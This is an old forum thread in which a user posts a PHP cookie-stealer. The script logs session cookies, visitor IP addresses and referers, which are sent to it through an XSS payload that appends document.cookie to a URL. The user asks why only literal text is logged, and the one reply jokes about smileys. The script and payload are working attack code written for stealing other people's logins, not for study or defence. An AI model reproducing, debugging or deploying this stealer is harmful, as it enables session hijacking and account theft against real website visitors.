XSS Script

ghost

0 0

18 years ago

Im trying to make a cookie stealer using the url: …/cookie.php?c='+document.cookie Im using this code:

&lt;head&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=iso-8859-1&quot;&gt;
&lt;title&gt;test&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;?php
$c = stripslashes(@$_GET[&#39;c&#39;]);
$cA = array();
$cA = split(&quot;;&quot;,$c);
$fp = fopen(&#39;cookie.html&#39;, &#39;a&#39;);
$ip = getenv (&#39;REMOTE_ADDR&#39;);
$date=date(&quot;j F, Y, g:i a&quot;);
$referer=getenv (&#39;HTTP_REFERER&#39;);
fwrite($fp,&#39;&lt;br&gt; [ &#39;.$ip.&#39; ] [ &#39;.$date.&#39; ]&lt;br&gt;[ &#39;.$referer.&#39; ]&lt;br&gt;&#39;);
for ($i=0; $i&lt;count($cA); ++$i)
{
fwrite($fp, &#39;&#8194;&#8194;&#39;.$cA[$i].&#39;&lt;br&gt;&#39;);
}
fwrite($fp,&#39;&lt;br&gt;&lt;br&gt;&#39;);
fclose($fp);
?&gt;
&lt;/body&gt;
&lt;/html&gt;

but in cookie.html i get the following:

[ ]
&#8194;&#8194;&#39; document.cookie```

Any help on why its not working?

Thanks, 

Will.

ghost

0 0

18 years ago

disamle smileys ! ;)

Uh oh. Looks like your using an ad blocker.

ghost

ghost